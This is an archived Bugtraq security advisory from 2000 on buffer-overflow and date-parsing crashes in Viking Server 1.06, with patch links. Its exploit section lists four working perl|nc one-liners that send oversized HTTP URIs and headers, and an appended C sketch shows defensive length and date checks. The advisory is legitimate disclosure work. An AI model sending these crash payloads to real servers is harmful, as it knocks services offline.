Bugtraq mailing list archives
[NT] Viking security vulnerabilities enable remote code execution (long URL, date parsing)
From: Aviram Jenik <aviram () BEYONDSECURITY COM>
Date: Mon, 28 Aug 2000 20:59:10 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Viking security vulnerabilities enable remote code execution (long URL, date parsing)
--------------------------------------------------------------------------------

SUMMARY

<http://www.robtex.com/viking/> Viking Server is a multi-protocol Internet server/proxy for Windows 95/NT that supports a wide range of protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP, ICP, etc. Unfortunately it does not perform proper buffer bounds checking, enabling attackers to launch a buffer overflow attack and possibly execute arbitrary code. Also, an incorrect parsing of non-date data causes an exception, enabling remote attackers to cause a Denial of Service attack against the product.

DETAILS

Vulnerable systems:
Viking 1.06 build 355 and prior

Immune systems:
Viking 1.06 build 370 and above

Exploit:
Any of the following HTTP commands will crash the server:

(1) GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

(2) GET / HTTP/1.1<enter>
    Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

(3) GET / HTTP/1.1<enter>
    If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)

(4) GET / HTTP/1.1<enter>
    If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

Patch:
Robtex has responded immediately and released a patch that deals with these issues. You can download the patch at:
ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
http://www.robtex.com/files/viking/beta/viking.zip

====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
====================

--
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com
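The two failure modes in the advisory (an unbounded request URI or header value, and non-date data reaching a date parser) are both closed by checking length before any copy and by rejecting values that are not well-formed dates. The following C sketch is an added example, not part of the advisory and not Viking's code; the limits `MAX_URI_LEN` and `MAX_VAL_LEN`, the `verdict` names and the function names are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h> /* strncasecmp (POSIX) */

#define MAX_URI_LEN 2048 /* assumed limits, not taken from the advisory */
#define MAX_VAL_LEN 128  /* an RFC 1123 date is only 29 bytes */
enum verdict { REQ_OK, REQ_MALFORMED, REQ_URI_TOO_LONG, REQ_VALUE_TOO_LONG, REQ_BAD_DATE };

/* Accept only the RFC 1123 shape, e.g. "Sun, 06 Nov 1994 08:49:37 GMT". */
static int is_http_date(const char *v, size_t n)
{
    char buf[MAX_VAL_LEN + 1], wd[4], mon[4], tz[4];
    int d, y, h, mi, s, used = -1;
    if (n > MAX_VAL_LEN) return 0; /* length is checked before the copy */
    memcpy(buf, v, n); buf[n] = '\0';
    if (sscanf(buf, "%3[A-Za-z], %2d %3[A-Za-z] %4d %2d:%2d:%2d %3[A-Z]%n",
               wd, &d, mon, &y, &h, &mi, &s, tz, &used) != 8) return 0;
    return used == (int)n && strcmp(tz, "GMT") == 0 && d >= 1 && d <= 31 &&
           h >= 0 && h <= 23 && mi >= 0 && mi <= 59 && s >= 0 && s <= 60;
}

/* Classify the request in req[0..len) using bounded reads only. */
enum verdict check_request(const char *req, size_t len)
{
    static const char *hdrs[] = { "If-Modified-Since:", "Unless-Modified-Since:", "If-Range:" };
    const char *end = req + len, *line = req, *nl;
    int first = 1;
    while (line < end && (nl = memchr(line, '\n', (size_t)(end - line))) != NULL) {
        size_t n = (size_t)(nl - line);
        if (n && line[n - 1] == '\r') n--;
        if (first) { /* request line: METHOD SP URI SP VERSION */
            const char *a = memchr(line, ' ', n);
            const char *b = a ? memchr(a + 1, ' ', n - (size_t)(a + 1 - line)) : NULL;
            if (!b) return REQ_MALFORMED;
            if ((size_t)(b - a - 1) > MAX_URI_LEN) return REQ_URI_TOO_LONG;
            first = 0;
        }
        for (int i = 0; line != req && i < 3; i++) { /* header lines only */
            size_t k = strlen(hdrs[i]);
            if (n < k || strncasecmp(line, hdrs[i], k) != 0) continue;
            const char *v = line + k;
            size_t vn = n - k;
            while (vn && *v == ' ') { v++; vn--; }
            if (vn > MAX_VAL_LEN) return REQ_VALUE_TOO_LONG;
            if (i < 2 && !is_http_date(v, vn)) return REQ_BAD_DATE; /* If-Range may be an entity tag */
        }
        line = nl + 1;
    }
    return first ? REQ_MALFORMED : REQ_OK;
}
```

A server would map these verdicts to a 414 or 400 response, or simply ignore a conditional header whose value is not a date, instead of handing the raw bytes to a fixed-size buffer or a date parser.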